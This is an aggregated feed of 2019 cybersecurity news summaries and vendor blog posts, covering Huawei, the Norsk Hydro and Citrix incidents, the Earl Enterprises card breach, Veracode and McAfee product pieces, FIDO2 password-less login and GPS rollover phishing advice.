The potential threat posed by Huawei to the UK national infrastructure continues to be played out. GCHQ called for a ban on Huawei technology within UK critical networks, such as 5G networks, while Three said a Huawei ban would delay the UK 5G rollout, and the EU ignored the US calls to ban Huawei in 5G rollouts, while promoting the EU Cybersecurity certification scheme to counter the Chinese IT threat, which is all rather confusing.  Meanwhile, Microsoft Researchers found an NSA-style Backdoor in Huawei Laptops, which was reported to Huawei by Microsoft, leading to the flaw being patched in January 2019.
A serious security flaw placed Royal Bank of Scotland (RBS) customers at risk. The vulnerability was discovered by PenTest Partners in the bank provided 'Heimdal Thor', security software, which was meant to protect NatWest customers from cyber-attacks but actually permitted remote injection commands at the customer's endpoint. PenTest Partners said "We were able to gain access to a victim's computer very easily. Attackers could have had complete control of that person's emails, internet history and bank details. To do this we had to intercept the user's internet traffic but that is quite simple to do when you consider the unsecured public wi-fi out there, and it's often all too easy to compromise home wi-fi setups.
 
Facebook made negative security headlines yet against after they disclosed that 20,000 of their employees had access to hundreds of millions of their user account passwords for years.

One of the world’s biggest aluminium producers, 
Norsk Hydrosuffered production outages after a ransomware outbreak impacted its European and US operations.  Damages from ransomware attack on Norsk Hydro reach as high as $40M.

Citrix disclosed a security breach of its internal network may have compromised 6Tb of sensitive data. The FBI had told Citrix that international cyber criminals had likely gained access to its internal network. Citrix said in a statement it had taken action to contain the breach, “We commenced a forensic investigation; engaged a leading cyber security firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI”.  According to security firm Resecurity, the attacks were perpetrated by Iranian-linked group known as IRIDIUM.

Credit monitoring Equifax admitted in a report it didn't follow its own patching schedule, neglecting to patch Apache Struts which led to a major 2017 breach which impacted 145 million people.  The report also said Equifax delayed alerting their customers for 6 weeks after detecting the breach.

ASUS computers had backdoors added through its software update system, in an attack coined “ShadowHammer”. Kaspersky researchers estimated malware was distributed to nearly a million people, although the cybercriminals appeared to have only targeted 600 specific devices. Asus patched the vulnerability but questions still remain.


The top 10 biggest breaches of 2018 according to 4iQ were:
  1. Anti-Public Combo Collections – (Hacked) Sanixer Collection #1-6, 1.8 billion unique email addresses.
  2. Aadhaar, India – (Open third party device) 1.1 billion people affected
  3. Marriott Starwood Hotels – (Hacked) 500 million guests PII
  4. Exactis – (Open device) 340 million people and businesses.
  5. HuaZhu Group – (Accidental Exposure) 240 million records
  6. Apollo – (Open device) 150 million app users.
  7. Quora – (Hacked) 100 million users.
  8. Google+ – (API Glitch) 52.2 million users.
  9. Chegg – (Hacked) 40 million accounts 
  10. Cathay Pacific Airways (Targeted attack) 9.4 million passengers.
Barracuda Networks reported the top 12 phishing email subject lines, after they analysed 360,000 phishing emails over a three-month period.
BLOG
NEWS

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

Why Traditional EDR Doesn’t Solve Today’s Modern Threats

Today’s cyberattacks are more advanced and complex than ever before. It’s no surprise that enterprises can no longer rely on traditional endpoint detection and response (EDR) solutions to protect against the evolving threat landscape. With the amount of data rapidly expanding in conjunction with an increasing number of endpoints, enterprise IT departments are facing new management and security challenges. EDR can provide businesses with another layer of threat detection in a multilayered security approach.

Cyberthreats Have Evolved, So Should Your Security

The impact of a cyberattack is no longer siloed to one employee’s device. It has the ability, speed, and scope to impact your entire business in mere seconds. And it’s hard not to think of cybersecurity as being the never-ending game of cat-and-mouse, with cybercriminals constantly developing new skills, updating code, and deploying new tactics to get inside your endpoints. But instead of your organization trying to play catch up, get ahead of malicious actors by developing a comprehensive security strategy to prevent attacks before they happen.

Many cyberthreats use multiple attack mechanisms, which means just one form of security is no longer enough to keep your entire enterprise secure from malicious actors. And although some anti-virus software can’t keep up with new malware or variants of known malware, it still plays an important role in a multilayered approach for a robust cybersecurity strategy. Endpoint detection and response is also essential when developing a comprehensive security approach. It offers a threat detection capability, allowing your next-generation solution to track down potential threats if they break through the first layer of your digital perimeter.

The Importance of EDR

The SANS Endpoint Protection and Response Survey reports that 44% of IT teams manage between 5,000 and 500,000 endpoints across its network. Each of these endpoints become an open door for a potential cyberattack. Given the increasing number of endpoints, organizations are beginning to understand that they’re more susceptible to breaches and are willing to adopt a multilayered security approach to prevent as many attacks as possible.

With endpoint detection and response, organizations have granular control and visibility into their endpoints to detect suspicious activity. There are new features and services for EDR, expanding its ability to detect and investigate threats. An EDR solution can discover and block threats in the pre-execution stage, investigate threats through analytics, and help provide an incident response plan. Additionally, some EDR solutions can leverage AI and machine learning to automate the steps in an investigative process. These new capabilities can learn an organization’s baseline behaviors and use this information, along with a variety of other threat intelligence sources, to interpret findings.

Incorporating EDR Into Your Security Strategy

The adoption of EDR is projected to increase significantly over the next few years. According to Stratistics MRC’s Endpoint Detection and Response – Global Market Outlook (2017-2026), sales of EDR solutions—both on-premises and cloud-based—are expected to reach $7.27 million by 2026, with an annual growth rate of nearly 26%.

When adopting EDR into your security portfolio, the application should have three basic components: endpoint data collection agents, automated response, and analysis and forensics. McAfee MVISION Endpoint Detection and Response (EDR) helps you get ahead of modern threats with AI-guided investigations that surface relevant risks and automate and remove the manual labor of gathering and analyzing evidence.

For more information on endpoint detection and response, check out our Security Awareness page and the McAfee Endpoint Security portfolio of products.

The post Why Traditional EDR Doesn’t Solve Today’s Modern Threats appeared first on McAfee Blogs.

ST03: Cloud Technology Trends with Wayne Anderson and Dan Flaherty

In this episode, we’ll hear from Wayne Anderson, Enterprise Security Architect at McAfee and Dan Flaherty from the cloud security product team speak on a wide range of topics from upcoming technology trends in the market, to adversarial machine learning, cloud models for security, and a look back at the RSA conference.

The post ST03: Cloud Technology Trends with Wayne Anderson and Dan Flaherty appeared first on McAfee Blogs.

Veracode Dynamic Analysis: Reduce the Risk of a Breach

This blog post has been updated as of April 2, 2019

Veracode Dynamic Analysis is a dynamic scanning solution that features automation, depth of coverage, and unmatched scalability. Built on microservices and cloud technologies, the Veracode Dynamic Analysis solution is available on the Veracode SaaS platform. Veracode Dynamic Analysis helps both vulnerability managers tasked with safeguarding the entire web application portfolio, and AppSec managers tasked with safeguarding critical applications in pre-production. With the frameworks developers use to build web applications changing often, and the push toward single page applications, Veracode Dynamic Analysis gives you the automated dynamic scanning you need to find vulnerabilities quickly and accurately.

Benefits of Scheduling Automation

Consistent dynamic scanning is key to keeping your web applications safe, and consistent scanning is achievable with an automated dynamic scanning solution. Imagine your CISO tells you to scan your web apps as often as feasible. Depending on remediation frequency, you come up with a quarterly, monthly, or weekly scanning schedule. To add additional complexity, IT gives you a maintenance window when dynamic scanning cannot occur. If you’re part of a global company, you also have time zones to contend with, making it virtually impossible to depend on a manual pause and resume, not to mention the inconvenience of waking up at 3:00 AM to pause a running scan. With all these variables to handle, you need a dynamic scanning solution that provides true automation to handle scheduling and IT maintenance windows, so you can “set it and forget it.” 

Recurring Scan Scheduling provides the ability to set up a schedule such that the application can be automatically scanned on a weekly, monthly, or quarterly cadence (or anything in between). Once the schedule has been set up, the dynamic scan will kick off automatically at the defined cadence. If the scan has been set up to start on a Tuesday, it will maintain that start day for the weekly scans to avoid running into weekends and holidays.

Automated Pause & Resume provides the ability to designate a maintenance window when the applications won’t be scanned. Dynamic scanning will be automatically paused when the IT maintenance window begins and automatically resume when the applications can be scanned. The pause and resume functionality has been built to ensure scanning resumes where it left off, with the goal of full coverage.

The screenshot below shows how to set up a weekly recurring scan that runs year round, pauses at midnight, and resumes at 4:00 AM each day.

  • Each week the application is dynamically scanned with the automated schedule and scan kick-off.
  • The system automatically pauses at the start of the maintenance window at 12:00 AM and resumes scanning at 4:00 AM.
  • You can adjust the duration based on the size of the application and the number of applications scanned in the batch to get the best coverage.

Authenticated Batch Scanning provides the ability to increase coverage by scanning behind the login screen, using a multitude of login mechanisms such as auto login, basic authentication, or uploading a login script. You can depend on the pre-scan feature to provide accurate feedback on the connection and authentication for the application under test, so you can fix any access issues ahead of the scheduled start time. In addition, a batch of scans can be kicked off at the same time to allow concurrent scanning with authentication. You save a lot of time when all applications can be concurrently scanned, with coverage for single page applications, modern frameworks such as Angular and ReactJS, and the ability to cover large web applications quickly.

Dynamic Analysis makes it easy to onboard applications and provides multiple input mechanisms. Uploading a CSV file is a quick way for large and small companies to take advantage of scanning applications concurrently.

Internal Scanning Management with Veracode Dynamic Analysis

There are many reasons for an application to live behind a firewall, beyond that it still in the development process waiting for test and quality assurance checks. Some applications are used for more sensitive financial operations and HR purposes, while others are used in highly regulated industries like healthcare and financial services. Even more simply, organizations use many applications internally and there is no reason for them to expose them externally. Historically, the enduser has had to install a Virtual Scan Appliance within their environment and send scan data through an insecure midpoint so the vendor can actually receive the data and return results.

Our Internal Scanning Management Feature takes a fresh approach to this challenge by offering a completely new, IT-compliant way to access these behind-the-firewall applications. Rather than using a Virtual Scan Appliance, or an on premise scanner that is difficult to maintain and does not scale, the Veracode Dynamic Analysis scanner continues to run in the cloud and uses the Secure Scanning Gateway. This gateway connection is completely controlled by the enduser. You can open the connection to scan your applications behind the firewall – and close the gateway whenever you’d like. This empowers you to not only scan applications that live behind the firewall, but to apply dynamic testing to applications in the Staging environment before they are pushed into production. Below is a screenshot with a gateway and endpoint from the Veracode Platform.

 

Show Me the Results: Consolidated View

Veracode Dynamic Analysis provides visibility into the scanning process to give you peace of mind and comprehensive results once the scanning is complete. The Veracode Platform’s Triage Flaw Viewer provides CWE details, vulnerability severity, along with request/response. In addition, the Platform provides reports to show scan coverage, summary reports for executives, and detailed reports for AppSec teams.

The goal of dynamic scanning is to find exploitable vulnerabilities at runtime, and remediate the issues found. The Dynamic Flaw Inventory provides a dashboard that provides historical vulnerability information, allowing AppSec managers to track team progress toward fixing vulnerabilities. 

Veracode Dynamic Analysis gives you a solution to scan your entire portfolio of web applications with ease, provides accurate results, and puts you on the path to remediate the findings. Even if you are running static scans early in the SDLC, dynamically scanning your web application at runtime uncovers exploitable vulnerabilities that static scans won’t find. Use our dynamic scanning solution to find and remediate flaws before a hacker exploits the vulnerability, resulting in a breach.

I’d love to hear your feedback

Would Veracode Dynamic Analysis benefit your AppSec program and reduce the risk of a breach? I’d like to hear your thoughts. To learn more please download our whitepaper, "Reducing Your Risk of a Breach with Dynamic Analysis," or to schedule a demo now, click here.

How Many Web Applications Does Your Organization Have? It’s More Than You Think

“Automation has saved a tremendous amount of time. We went from a day per app to review and now we are essentially reviewing through automation 18,000 scans a day with only 20 AppSec engineers. You do the math — 18,000 deploys a day with 20 engineers — you can’t scale that manually.”

Senior manager application and cloud security, insurance, The Total Economic ImpactTM of the Veracode Application Security Platform Study

One of the things we pride ourselves on here at Veracode is offering solutions and services that help add a little bit more ease to the application security process. We talk a lot about shifting left, and we do our best to put our money where our mouths are by creating a variety of integrations and automations that empower development teams to adopt a security-first mindset without sacrificing speed or agility. Yet there is more to a complete and holistic application security program than scanning in the CI/CD or making sure you’re securing open source components.

What about all of the web applications that you don’t know or simply forgot about? What about the exploitable vulnerabilities that can only be found at runtime? Or the applications that contain sensitive data and live behind the firewall? In order to ensure the security of these applications – and to make sure you have a proper inventory – you need to conduct discovery and dynamic scans.

What Do You Mean Web Applications I Don’t Know About or Forgot?

It’s more common that you would imagine that organizations and brands have more web apps than they realize – at Veracode, we help our clients create comprehensive application inventories, and find that they are, on average, comprised of roughly 30 percent more applications than clients knew about. For example, in M&A activity, more than just a company or brand is acquired – you also acquire their web assets. Further, the digital landscape is decorated with marketing promotional sites meant to attract attention.

Paul Farrington, Veracode CTO in EMEA, is familiar with how common it is to underestimate the extent and reach of an organization’s IT assets. In a project that Veracode conducted for a high street bank, we discovered 1,800 websites that had yet to be logged.

“Their perimeter can be 50% larger than they originally thought it was,” Farrington told the BBC.

It's impossible to secure an entire web application attack surface if you don’t know about all of your applications, and the very thing meant to draw attention to your brand and boost your bottom line is the same target attackers go after to infiltrate your organization. According to the 2018 Verizon Data Breach Investigations Report, web applications continue to be the number one vector for reported breaches. In nearly 90 percent of breaches, it took only minutes for attackers to gain access – and it took months for nearly 70 percent of organizations to detect the systems that had been compromised.

Securing ALL of Your Web Applications With Veracode Discovery + Veracode Dynamic Analysis

Without a solution to help you discover these web applications, you can never be completely certain that you have scanned all of your web applications. This is where Veracode Discovery can help.

Veracode Discovery is a threat intelligence solution that leverages IP ranges, host names, keywords, and other inputs to scan the web for every web application that may be associated with your organization. The results are uploaded to the Veracode Application Security Platform where users can sort through the findings and input them into Veracode Dynamic Analysis through an easy-to-follow workflow. This ensures that you have full visibility into what your organization owns and that you are able to either scan and remediate those applications or sunset them, which improves the organization’s overall security posture.

Veracode Dynamic Analysis is fast, but it’s not just about the speed at which a scan returns results. It’s about the complete workflow – scan start, scan complete, and through to remediation. Veracode Dynamic Analysis is fast because of scheduling automation and a single upload that allows you to batch upload multiple applications into the same analysis. As a SaaS solution, Veracode Dynamic Analysis is able to kick off a scan for hundreds of applications at the same time. Unlike other solutions on the market, Veracode Dynamic Analysis can concurrently scan both authenticated and unauthenticated applications both in front of and behind a firewall. What’s more, the results that you receive are immediately actionable: they contain less than 1 percent false positives thanks to the accuracy of our scanner and limited manual scrubbing.

Veracode Dynamic Analysis covers a wide variety of application frameworks, including Single Page Applications, JavaScript apps, HTML5, Angular, and ReactJS. This gives you the reassurance that Veracode Dynamic Analysis will be able to return results on your applications and provide you with actionable results.

To learn more about Veracode Dynamic Analysis, download our whitepaper, Reducing Your Risk of a Breach with Dynamic Analysis.

Password-less future moves closer as Google takes FIDO2 for a walk

For years, many organisations – and their users – have struggled with the challenge of password management. The technology industry has toiled on this problem by trying to remove the need to remember passwords at all. Recent developments suggest we might finally be reaching a (finger) tipping point.

At Mobile World Congress this year, Google and the FIDO Alliance announced that most devices running Android 7.0 or later can provide password-less logins in their browsers. To clarify, the FIDO2 authentication standard is sometimes called password-less web authentication. Strictly speaking, that’s a slightly misleading name because people still need to authenticate to their devices a PIN, or a using a biometric identifier like a fingerprint. It’s more accurate to say FIDO2 authentication, but not surprisingly, the term ‘password-less’ seems to have caught the imagination.

Wired reported that web developers can now make their sites work with FIDO2, which would mean people can log in to their online accounts on their phones without a password. This feature will be available to an estimated one billion Android devices, so it’s potentially a significant milestone on the road to a password-less future. Last November, Microsoft announced password-less sign-in for its account users, with the same FIDO2 standard. One caveat: Microsoft’s option requires using the Edge browser on Windows 10 1809 build. So, the true number of users is likely to be far lower than the 800 million Microsoft had been promising. But this is just the latest place where Microsoft has inserted FIDO technology into its products.

It’s not what you know

I spoke to Neha Thethi, BH Consulting’s senior information security analyst, who gave her reaction to this development. “Through this standard, FIDO and Google pave way for users to authenticate primarily using ‘something they have’ the phone – rather than ‘something they know’ the password. While a fingerprint or PIN would typically be required to unlock the device itself, no shared secret or private key is transferred over the network or stored with the website, as it is in case of a password. Only a public key is exchanged between the user and the website.”  

From the perspective of improving security, Google’s adoption of FIDO2 is a welcome development, Neha added. “Most of the account compromises that we’ve seen in past few years is because of leaked passwords, on the likes of Pastebin or through phishing, exploited by attackers. The HaveIbeenpwned website gives a sense of the scale of this problem. By that measure, going password-less for logging in to online accounts will definitely decrease the attack surface significantly,” she said.

“The technology that enables this ease of authentication is public key cryptography, and it has been around since the 1970s. The industry has recognised this problem of shared secrets for a long time now. Personally, I welcome this solution to quickly and securely log in to online accounts. It might not be bulletproof, but it takes an onerous task of remembering passwords away from individuals,” she said.

Don’t try to cache me

Organisations have been using passwords for a long time to log into systems that store their confidential or sensitive information. However, even today, many of these organisations don’t have a systematic way of managing passwords for their staff. If an organisation or business wants to become certified to the ISO 27001 security standard, for example, they will need to put in place measures in the form of education, process and technology, to ensure secure storage and use of passwords. Otherwise, you tend to see less than ideal user behaviour like storing passwords on a sticky note or in the web browser cache. “I discourage clients from storing passwords in the browser cache because if their machine gets hacked, the attacker will have access to all that information,” said Neha. 

That’s not to criticise users, she emphasised. “If an organisation is not facilitating staff with a password management tool, they will find the means. They try the best they can, but ultimately they want to get on with their work.”

The credential conundrum

The security industry has struggled with the problem of access and authentication for years. It hasn’t helped by shifting the burden onto the people least qualified to do something about it. Most people aren’t security experts, and it’s unfair to expect them to be. Many of us struggle to remember our own phone numbers, let alone a complex password. Yet some companies force their employees to change their passwords regularly. What happens next is the law of unintended consequences in action. People choose a really simple password, or one that barely changes from the one they’d been using before.

For years, many security professionals followed the advice of the US National Institute of Standards and Technology (NIST) for secure passwords. NIST recommended using a minimum of seven characters, and to include numbers, capital letters or special characters. By that measure, a password like ‘Password1’ would meet the recommendations even if no-one would think it was secure.

Poor password advice

Bill Burr, the man who literally wrote the book on passwords for NIST, has since walked back on his own advice. In 2017, he told the Wall Street Journal, “much of what I did I now regret”. He added: “In the end, it was probably too complicated for a lot of folks to understand very well, and the truth is, it was barking up the wrong tree”. NIST has since updated its password advice, and you can find the revised recommendations here.

As well as fending off cybercrime risks, another good reason for implementing good access control is GDPR compliance. Although the General Data Protection Regulation doesn’t specifically refer to passwords, it requires organisations to process personal data in a secure manner. The UK’s Information Commissioner’s Office has published useful free guidance about good password practices with GDPR in mind.

Until your organisation implements the password-less login, ensure you protect your current login details. Neha recommends using a pass phrase instead of a password along with two factor authentication where possible. People should also use different pass phrases for each website or online service we use, because using the same phrase over and over again puts us at risk if attackers compromised any one of those sites. Once they get one set of login credentials, they try them on other popular websites to see if they work. She also recommends using a good password manager or password keeper in place of having to remember multiple pass phrases or passwords. Just remember to think of a strong master password to protect all of those other login details!

The post Password-less future moves closer as Google takes FIDO2 for a walk appeared first on BH Consulting.

TGDC Video/Teleconference

In accordance with the Federal Advisory Committee Act (FACA), Public Law 92-463, as amended (5 U.S.C. Appendix 2), the U.S.

Cloudbric Cements Commitment to Cloud Infrastructure And Blockchain Business By Partnering With AWS


AWS_APN Logo

Cloudbric currently holds Technology Partner status with Amazon Web Services (AWS).

The AWS Partner Network (APN) is a global partner program composed of cloud software and service vendors that have earned endorsement from AWS after meeting several important criteria.

With the cloud computing market estimated to be worth 272 billion USD worldwide, cloud computing has made it easy to access applications and data from virtually anywhere, without compromising scalability or security. 

Cloudbric’s partnership with AWS has armed us with additional tools and resources from Amazon enabling us to differentiate our solution for AWS customers with improved functionality and cloud security service offerings.

As a Technology Partner, Cloudbric is made-ready for the cloud environment.

Not only that, but as Cloudbric expands into the blockchain business (by currently providing web security services to numerous crypto exchanges and other wallet platforms), we realize cloud infrastructure is more important than ever.

It’s why Cloudbric has announced it has delved into the operation of blockchain wallet nodes.

When it comes to exchanges or wallets, nodes are necessary for its stable operation on the blockchain network which typically requires to operate in multiple regions as nodes are hosted in data centers.

As a result, Cloudbric aims to secure the operation and building of blockchain nodes in its existing data centers and servers around the world.

Until now Cloudbric has been able to provide cloud-based security services around the world, and this know-how in cloud infrastructure has led to the signing of blockchain node operation contracts and is expected to draw the attention of companies that operate blockchain wallets.


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Cloudbric Cements Commitment to Cloud Infrastructure And Blockchain Business By Partnering With AWS appeared first on Cloudbric.

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, users are extremely reliant on our GPS devices. In fact, we’re so reliant on these devices that map features are programmed into almost every IoT device we use as well as inside of our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with a nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

March Hackness: A Recap

At our core Security Innovation is a company helping to educate the world about Application Security wherever we can. Whether it be through our Computer Based Training, Security Testing or Cyber Range, we always get excited to see our customers learn and improve their security skills. A perfect example is Brandon Evans - a software engineer who recently won our AppSec Cali event and followed that up by finding all 55 issues in our InstaFriends site. Congratulations Brandon!

Scan WordPress websites for vulnerabilities WPScan Kali Linux

Scan WordPress websites for vulnerabilities WPScan Kali Linux   WPScan is a black box vulnerability scanner for WordPress websites. WPScan comes pre-installed in Kali Linux. Kali Linux is a popular Linux distribution built on Debian Kali Linux comes with many of the best ethical hacking tools pre-installed. If you’re not using Kali Linux and you […]

The post Scan WordPress websites for vulnerabilities WPScan Kali Linux appeared first on HackingVision.

New eLearning Learner Levels Streamline Verified Progress

Before customers buy from you, they ask “Can you prove that your application is secure, and that you will protect our data if we give it to you?” Companies around the world struggle to answer this question, especially with the advancement of DevOps and rapid changes/deployment of applications into production. As such, we launched Verified to help you prove to your customers that you adopt security best practices for your applications and the developers that support them on an ongoing basis.

Veracode Verified is a three-tier maturity program that includes several training elements. For example, to reach the Verified Team tier, one requirement is to select and train a security champion. A requirement to reach Verified Continuous is to roll out security fundamentals training to all developers working on an application. 

Veracode Introduces Learning Levels

In order to help companies track the maturity of their eLearning program and their progress toward Verified tiers, Veracode launched learning levels in the eLearning product. The new enhancement to eLearning includes the following:

Learning Levels: There are three levels that individuals can reach within the platform. Each level has a requirement in terms of specific courses a user must complete in order to obtain that level.

Level 1 – Developer Security Fundamentals

Level 2 – Verified Team Security Champion

Level 3 – Verified Continuous Security Champion

Visit our website for more details on developer training.

Platform Badges: There are now badges next to user names that align to the level the user has reached. This allows managers to quickly identify that their teams have met their policy requirements for eLearning.

Certificate: Users can also download a certificate that shows their name, the level they reached, and the date they achieved their status.

Reporting: Managers can download a report for their teams on the levels they achieved, and the date it was achieved.

A Variety of Developer Training that Meets Your Specific Needs

With the increased speed of development, plus security shifting “left,” developers need to catch security-related defects on their own as often as possible. However, most developers have had no opportunities to learn secure coding, in school or on the job. Veracode offers application security leaders the chance to engage developers with various types of training, from self-service eLearning to fully customizable on-site workshops. 

Learn more about proving the security of your development process with our Verified program, and the different training elements needed to become Verified.